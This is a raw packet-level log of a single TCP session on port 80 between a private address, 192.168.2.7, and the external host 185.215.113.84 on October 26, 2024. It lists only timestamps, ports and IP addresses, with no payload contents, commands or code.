Oct 26, 2024 07:27:20.118468046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118479967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118518114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118547916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118561029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118586063 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118598938 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118617058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118654013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118674994 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118685961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118702888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118714094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118715048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118726015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118738890 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118746042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118772030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118825912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118837118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118865013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.118885040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118895054 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.118921041 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.124296904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.124317884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.124330997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.124396086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.124408007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.124419928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.124509096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.163784981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.163796902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.163814068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.163825989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.163836956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.163850069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.163861990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.163872004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.163877010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.163921118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164150000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164163113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164177895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164184093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164197922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164211988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164362907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164381027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164393902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164405107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164406061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164417982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164437056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164462090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164709091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164721012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164731979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164751053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164755106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164762974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164776087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164777994 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164788008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164798975 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.164807081 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164824963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.164844990 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165357113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165369987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165381908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165395021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165406942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165412903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165430069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165458918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165622950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165653944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165669918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165673018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165683031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165688038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165703058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165709972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165716887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165719032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165729046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165733099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165744066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165752888 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165755033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.165771008 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.165786982 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.208278894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.208290100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.208302021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.208343029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.208384991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.208411932 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.235394955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235414982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235425949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235436916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235451937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235469103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235496998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.235543966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.235805035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235816956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235826969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.235856056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.235867023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.236294031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236332893 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236340046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.236345053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236373901 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.236401081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236413002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236424923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236430883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236443043 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.236469984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.236532927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236545086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236556053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.236579895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.236592054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.241923094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.241934061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.241982937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.242008924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.242028952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.242042065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.242048025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.242073059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.242085934 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.242096901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.242132902 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.281508923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281527996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281541109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281552076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281564951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281577110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281578064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.281589985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281610012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.281632900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.281819105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281831026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281841993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281862974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.281874895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.281904936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281922102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281933069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281944036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281948090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.281956911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.281969070 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.281980991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282007933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282202005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282212019 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282246113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282263041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282274961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282284975 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282306910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282330036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282387018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282404900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282417059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282428026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282428980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282440901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282444000 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282466888 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282491922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282495975 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282507896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282521009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282532930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282537937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282545090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282556057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282557011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.282582045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.282597065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.283091068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283102989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283119917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283133030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283135891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.283143997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283158064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.283158064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283183098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.283206940 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.283499002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283510923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283521891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283538103 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.283546925 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.283576012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.283598900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.283612013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.325858116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.325911045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.325917006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.325930119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.325946093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.325952053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.325957060 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.325982094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.326005936 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.352879047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.352897882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.352910042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.352931023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.352940083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.352946043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.352951050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.352960110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.352972984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.353003025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.353323936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353334904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353342056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353399038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.353744030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353754044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353765965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353781939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.353809118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.353826046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353837967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353848934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.353876114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.353903055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.354055882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.354068995 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.354082108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.354098082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.354115963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.354137897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.354137897 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.354171991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.354175091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.354186058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.354208946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.354208946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.354231119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.354243994 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.359572887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.359586000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.359612942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.359633923 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.359654903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.359658003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.359692097 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.359694958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.359705925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.359730959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.359745026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.359746933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.359781981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399270058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399296045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399326086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399333954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399344921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399363041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399364948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399372101 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399379015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399394989 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399405956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399415970 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399421930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399440050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399446964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399446964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399465084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399465084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399482012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399491072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399501085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399504900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399525881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399528027 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399545908 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399555922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399607897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399631977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399645090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399647951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399667025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399669886 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399688959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399707079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399897099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399912119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399926901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399941921 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399949074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399951935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.399967909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.399990082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400091887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400108099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400122881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400131941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400141001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400157928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400162935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400175095 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400192022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400194883 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400208950 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400224924 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400505066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400521040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400537968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400561094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400561094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400563955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400573015 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400579929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400594950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400598049 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400612116 CEST	80	49982	185.215.113.84	192.168.2.7
